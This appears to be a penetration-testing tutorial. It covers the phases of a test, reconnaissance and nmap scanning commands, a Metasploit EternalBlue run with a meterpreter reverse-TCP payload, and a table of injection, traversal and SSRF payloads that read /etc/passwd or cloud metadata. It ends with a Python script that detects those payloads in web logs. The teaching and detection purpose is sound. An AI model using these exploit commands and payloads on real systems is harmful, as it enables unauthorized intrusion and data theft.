Legal Disclaimer
Only perform penetration testing on systems you own or have explicit written authorization to test. Unauthorized hacking is illegal.
What is Penetration Testing?
Penetration testing (pentesting) is a simulated cyber attack against your computer system to check for exploitable vulnerabilities. Unlike vulnerability assessments, pentests attempt to actively exploit weaknesses.
Types of Pentests
- Black Box: Tester has no prior knowledge of the system
- White Box: Full knowledge (source code, architecture)
- Gray Box: Partial knowledge (user credentials)
The 5 Phases of Pentesting
Reconnaissance (OSINT)
Gather information about the target without direct interaction. Use public sources like WHOIS, DNS, social media, job postings.
Scanning & Enumeration
Actively probe the target to discover open ports, services, and potential vulnerabilities.
Exploitation
Attempt to exploit discovered vulnerabilities to gain unauthorized access.
Post-Exploitation
Maintain access, escalate privileges, pivot to other systems, exfiltrate data.
Reporting
Document findings with severity ratings and remediation recommendations.
Reconnaissance Techniques
Passive Reconnaissance
# WHOIS Lookup
whois example.com
# DNS Enumeration (many resolvers refuse ANY queries, so query record types individually if this returns nothing)
dig example.com ANY
dig +short mx example.com
# Subdomain Discovery
subfinder -d example.com -o subdomains.txt
# Google Dorking
site:example.com filetype:pdf
site:example.com inurl:admin
site:example.com "password" OR "credentials"
OSINT Tools
- theHarvester: Email, subdomain, IP discovery
- Shodan: Search for internet-connected devices
- Maltego: Visual link analysis
- Recon-ng: Modular reconnaissance framework
Scanning & Enumeration
Nmap Scanning
# TCP scan of a subnet with version detection, default scripts and OS detection, saved in all output formats (-oA)
nmap -sV -sC -O -oA scan_results 192.168.1.0/24
# Full Port Scan
nmap -p- -T4 -A -v target.com
# UDP Scan (requires root; limited to the 100 most common UDP ports)
nmap -sU --top-ports 100 target.com
# Vulnerability Scan
nmap --script vuln target.com
Web Application Scanning
# Directory Brute Force
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt
# Nikto Web Scanner
nikto -h http://target.com
# WPScan (WordPress)
wpscan --url http://target.com --enumerate u,vp,vt
Exploitation
Metasploit Framework
# Start Metasploit
msfconsole
# Search for exploits
search type:exploit platform:windows smb
# Use an exploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
exploit
Common Vulnerabilities to Test
| Vulnerability | Example Test Payload |
|---|---|
| SQL Injection | ' OR '1'='1 |
| XSS | <script>alert(1)</script> |
| Command Injection | ; cat /etc/passwd |
| Path Traversal | ../../../etc/passwd |
| SSRF | http://169.254.169.254/ |
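As an added example (not part of the original cheat sheet), a small Python detector that runs the payload classes from this table over web-server access-log lines, which is how a defender verifies after a test that the probes were logged and can be alerted on. The log lines, client addresses and regex patterns are constructed for illustration and are assumptions, not a complete signature set:

```python
import re
from urllib.parse import unquote_plus
# One regex per payload class from the table above; applied to the URL-decoded
# request target so encoded variants (%27, %3Cscript%3E, %2e%2e%2f) are caught.
PATTERNS = {
    "sql_injection": re.compile(r"'\s*(or|and)\s*'?\d+'?\s*=\s*'?\d+", re.I),
    "xss": re.compile(r"<\s*script\b|javascript:", re.I),
    "command_injection": re.compile(r"[;|`]\s*(cat|id|whoami|ls|wget|curl)\b", re.I),
    "path_traversal": re.compile(r"(\.\./|\.\.\\){2,}"),
    "ssrf": re.compile(r"https?://(169\.254\.169\.254|127\.0\.0\.1|localhost)\b", re.I),
}
# Apache/nginx combined log format: client - - [time] "METHOD target proto" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def parse_line(line):
    # Split one access-log line into its fields, or return None if it does not parse.
    m = LOG_RE.match(line)
    if not m:
        return None
    client, ts, method, target, status = m.groups()
    # Decode twice so double-encoded payloads (%2527 -> %27 -> ') are normalised too.
    decoded = unquote_plus(unquote_plus(target))
    return {"client": client, "time": ts, "method": method, "target": target,
            "decoded": decoded, "status": int(status)}

def classify(decoded_target):
    """Return the sorted names of every payload class present in a decoded target."""
    return sorted(name for name, rx in PATTERNS.items() if rx.search(decoded_target))

def scan_log(lines):
    """Return one finding per parseable line that matches at least one payload class."""
    findings = []
    for rec in filter(None, map(parse_line, lines)):
        hits = classify(rec["decoded"])
        if hits:
            findings.append({"client": rec["client"], "status": rec["status"],
                             "target": rec["target"], "classes": hits})
    return findings

# Constructed sample lines (not real traffic): one per table row plus one benign request.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Dec/2024:10:00:01 +0000] "GET /login?user=admin%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Dec/2024:10:00:02 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 88',
    '10.0.0.7 - - [01/Dec/2024:10:00:03 +0000] "GET /ping?host=8.8.8.8;cat%20/etc/passwd HTTP/1.1" 500 0',
    '10.0.0.7 - - [01/Dec/2024:10:00:04 +0000] "GET /download?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 403 0',
    '10.0.0.9 - - [01/Dec/2024:10:00:05 +0000] "GET /fetch?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1" 200 1024',
    '10.0.0.2 - - [01/Dec/2024:10:00:06 +0000] "GET /index.html HTTP/1.1" 200 2048',
]
if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['client']} {f['status']} {','.join(f['classes'])} {f['target']}")
```

A 200 status on a matched line is the interesting case to triage: the server accepted the request rather than rejecting it.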
Reporting
A professional pentest report includes:
- Executive Summary: High-level overview for management
- Scope: What was tested
- Methodology: Tools and techniques used
- Findings: Each vulnerability with severity (CVSS), evidence, remediation
- Conclusion: Overall security posture assessment
CVSS Severity Scale
- 0.0 None
- 0.1-3.9 Low
- 4.0-6.9 Medium
- 7.0-8.9 High
- 9.0-10.0 Critical
Updated: December 2024